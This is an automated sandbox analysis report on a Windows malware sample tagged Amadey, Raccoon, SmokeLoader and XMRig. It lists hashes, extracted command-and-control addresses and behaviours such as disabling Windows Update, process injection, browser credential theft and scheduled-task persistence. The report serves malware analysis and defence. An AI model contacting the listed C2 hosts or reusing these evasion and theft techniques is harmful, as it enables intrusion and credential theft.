amadey | 2c18cc487d7d1078460dce7e68108cb99eab6cb9ee1955ca4df3b2376f0a0e8b

Analysis

max time kernel
151s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
31-01-2023 08:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

83baf716c50b90d398e1285d0c8c04c8.exe
Size

4.5MB
MD5

83baf716c50b90d398e1285d0c8c04c8
SHA1

f3fcfe9bc9979ee7e3788507d10499d031df4c5c
SHA256

2c18cc487d7d1078460dce7e68108cb99eab6cb9ee1955ca4df3b2376f0a0e8b
SHA512

fcdfa7df6a6a454f95c34a6a25aef620d3caa055bf9332579f31ed63990534532c93918ac9ffca698912cb0eb123f31c58f46e78e912cfaa758f34f0c9e84213
SSDEEP

98304:XNuy0rzmaXuKBh0MiS+dOUOTvwuw8/VnZaSavvETlCC:duyGKZKBh0M6ObT19Z/u3

Score

10^/10

amadey raccoon smokeloader xmrig 04f8fa0bf52b1b98a127f6deeac54f84 backdoor evasion miner spyware stealer trojan upx vmprotect

Malware Config

Extracted

Family

amadey

Version

3.65

77.73.134.27/8bmdh3Slb2/index.php

Extracted

Family

raccoon

Botnet

04f8fa0bf52b1b98a127f6deeac54f84

http://94.131.3.70/

http://83.217.11.11/

http://83.217.11.13/

http://83.217.11.14/

http://45.15.156.222/

rc4.plain

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Detects Smokeloader packer 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1428-200-0x00000000004A0000-0x00000000004A9000-memory.dmp	family_smokeloader

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exerundll32.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2240	4020	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1696	4020	rundll32.exe

Raccoon
Raccoon is an infostealer written in C++ and first seen in 2019.
stealer raccoon
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs

Processes:

XandETC.exeupdater.execonhost.exe

description	pid	process	target process
PID 4648 created 2596	4648	XandETC.exe	Explorer.EXE
PID 4648 created 2596	4648	XandETC.exe	Explorer.EXE
PID 4648 created 2596	4648	XandETC.exe	Explorer.EXE
PID 4648 created 2596	4648	XandETC.exe	Explorer.EXE
PID 4648 created 2596	4648	XandETC.exe	Explorer.EXE
PID 3560 created 2596	3560	updater.exe	Explorer.EXE
PID 3560 created 2596	3560	updater.exe	Explorer.EXE
PID 3560 created 2596	3560	updater.exe	Explorer.EXE
PID 3560 created 2596	3560	updater.exe	Explorer.EXE
PID 3560 created 2596	3560	updater.exe	Explorer.EXE
PID 760 created 2596	760	conhost.exe	Explorer.EXE
PID 3560 created 2596	3560	updater.exe	Explorer.EXE
PID 3560 created 2596	3560	updater.exe	Explorer.EXE

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 2 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/1384-297-0x00007FF78F0E0000-0x00007FF78F8D4000-memory.dmp	xmrig
behavioral2/memory/1384-299-0x00007FF78F0E0000-0x00007FF78F8D4000-memory.dmp	xmrig

Blocklisted process makes network request 1 IoCs

Processes:

rundll32.exe

flow pid process

135 1264 rundll32.exe
Downloads MZ/PE file

flow	pid	process
135	1264	rundll32.exe

Executes dropped EXE 15 IoCs

Processes:

Player3.exepb1111.exeddli.exenbveek.exebirges.exeddli.exepb1111.exerandom.exerandom.exeXandETC.exenbveek.exeChromeSetup.exe8D9A.exeupdater.exenbveek.exe

pid	process
1932	Player3.exe
804	pb1111.exe
3708	ddli.exe
3984	nbveek.exe
5004	birges.exe
4528	ddli.exe
2976	pb1111.exe
2368	random.exe
1932	random.exe
4648	XandETC.exe
3700	nbveek.exe
1428	ChromeSetup.exe
2564	8D9A.exe
3560	updater.exe
1648	nbveek.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/1384-297-0x00007FF78F0E0000-0x00007FF78F8D4000-memory.dmp	upx
behavioral2/memory/1384-299-0x00007FF78F0E0000-0x00007FF78F8D4000-memory.dmp	upx

VMProtect packed file 6 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\pb1111.exe	vmprotect
C:\Users\Admin\AppData\Local\Temp\pb1111.exe	vmprotect
behavioral2/memory/804-147-0x0000000140000000-0x0000000140618000-memory.dmp	vmprotect
C:\Users\Admin\AppData\Local\Temp\1000089001\pb1111.exe	vmprotect
C:\Users\Admin\AppData\Local\Temp\1000089001\pb1111.exe	vmprotect
behavioral2/memory/2976-180-0x0000000140000000-0x000000014061A000-memory.dmp	vmprotect

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

nbveek.exeddli.exerandom.exe83baf716c50b90d398e1285d0c8c04c8.exePlayer3.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	nbveek.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	ddli.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	random.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	83baf716c50b90d398e1285d0c8c04c8.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	Player3.exe

Loads dropped DLL 5 IoCs

Processes:

rundll32.exerundll32.exerundll32.exerundll32.exerundll32.exe

pid process

4884 rundll32.exe
832 rundll32.exe
4612 rundll32.exe
2116 rundll32.exe
1264 rundll32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

pid	process
4884	rundll32.exe
832	rundll32.exe
4612	rundll32.exe
2116	rundll32.exe
1264	rundll32.exe

Drops file in System32 directory 3 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

birges.exerundll32.exeupdater.exe

description	pid	process	target process
PID 5004 set thread context of 2712	5004	birges.exe	jsc.exe
PID 1264 set thread context of 3380	1264	rundll32.exe	rundll32.exe
PID 3560 set thread context of 760	3560	updater.exe	conhost.exe
PID 3560 set thread context of 1384	3560	updater.exe	conhost.exe

Drops file in Program Files directory 4 IoCs

Processes:

cmd.execmd.exeXandETC.exeupdater.exe

description	ioc	process
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Notepad\Chrome\updater.exe	XandETC.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

1524 sc.exe
4876 sc.exe
4660 sc.exe
4148 sc.exe
4336 sc.exe
1016 sc.exe
2752 sc.exe
5004 sc.exe
3676 sc.exe
760 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
1524	sc.exe
4876	sc.exe
4660	sc.exe
4148	sc.exe
4336	sc.exe
1016	sc.exe
2752	sc.exe
5004	sc.exe
3676	sc.exe
760	sc.exe

Program crash 4 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
2460	4884	WerFault.exe	rundll32.exe
4564	832	WerFault.exe	rundll32.exe
4856	2116	WerFault.exe	rundll32.exe
3400	2564	WerFault.exe	8D9A.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

ChromeSetup.exe

description	ioc	process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	ChromeSetup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	ChromeSetup.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	ChromeSetup.exe

Checks processor information in registry 2 TTPs 17 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

rundll32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	rundll32.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	rundll32.exe
Key value enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier	rundll32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision	rundll32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	rundll32.exe
Key value enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	rundll32.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1068 schtasks.exe

pid	process
1068	schtasks.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

Processes:

Explorer.EXE

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Toolbar	Explorer.EXE

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exepowershell.execonhost.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe

Modifies registry class 30 IoCs

Processes:

Explorer.EXErundll32.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 820074001c0043465346160031000000000000000000100041707044617461000000741a595e96dfd3488d671733bcee28bac5cdfadf9f6756418947c5c76bc0b67f400009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004100700070004400610074006100000042000000	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = 00000000ffffffff	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 = 4e003100000000003f56794e100054656d7000003a0009000400efbe0c55ec983f56804e2e0000000000000000000000000000000000000000000000000029815500540065006d007000000014000000	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 50003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014000000	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f44471a0359723fa74489c55595fe6b30ee0000	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\NodeSlot = "1"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\WorkFolders	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\MRUListEx = ffffffff	Explorer.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	Explorer.EXE

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	10	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	86	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

Explorer.EXE

pid process

2596 Explorer.EXE

pid	process
2596	Explorer.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

birges.exeChromeSetup.exeExplorer.EXE

pid	process
5004	birges.exe
5004	birges.exe
5004	birges.exe
5004	birges.exe
5004	birges.exe
5004	birges.exe
5004	birges.exe
5004	birges.exe
5004	birges.exe
5004	birges.exe
5004	birges.exe
5004	birges.exe
5004	birges.exe
5004	birges.exe
5004	birges.exe
5004	birges.exe
5004	birges.exe
5004	birges.exe
5004	birges.exe
5004	birges.exe
5004	birges.exe
5004	birges.exe
5004	birges.exe
5004	birges.exe
5004	birges.exe
5004	birges.exe
1428	ChromeSetup.exe
1428	ChromeSetup.exe
2596	Explorer.EXE
2596	Explorer.EXE
2596	Explorer.EXE
2596	Explorer.EXE
2596	Explorer.EXE
2596	Explorer.EXE
2596	Explorer.EXE
2596	Explorer.EXE
2596	Explorer.EXE
2596	Explorer.EXE
2596	Explorer.EXE
2596	Explorer.EXE
2596	Explorer.EXE
2596	Explorer.EXE
2596	Explorer.EXE
2596	Explorer.EXE
2596	Explorer.EXE
2596	Explorer.EXE
2596	Explorer.EXE
2596	Explorer.EXE
2596	Explorer.EXE
2596	Explorer.EXE
2596	Explorer.EXE
2596	Explorer.EXE
2596	Explorer.EXE
2596	Explorer.EXE
2596	Explorer.EXE
2596	Explorer.EXE
2596	Explorer.EXE
2596	Explorer.EXE
2596	Explorer.EXE
2596	Explorer.EXE
2596	Explorer.EXE
2596	Explorer.EXE
2596	Explorer.EXE
2596	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE
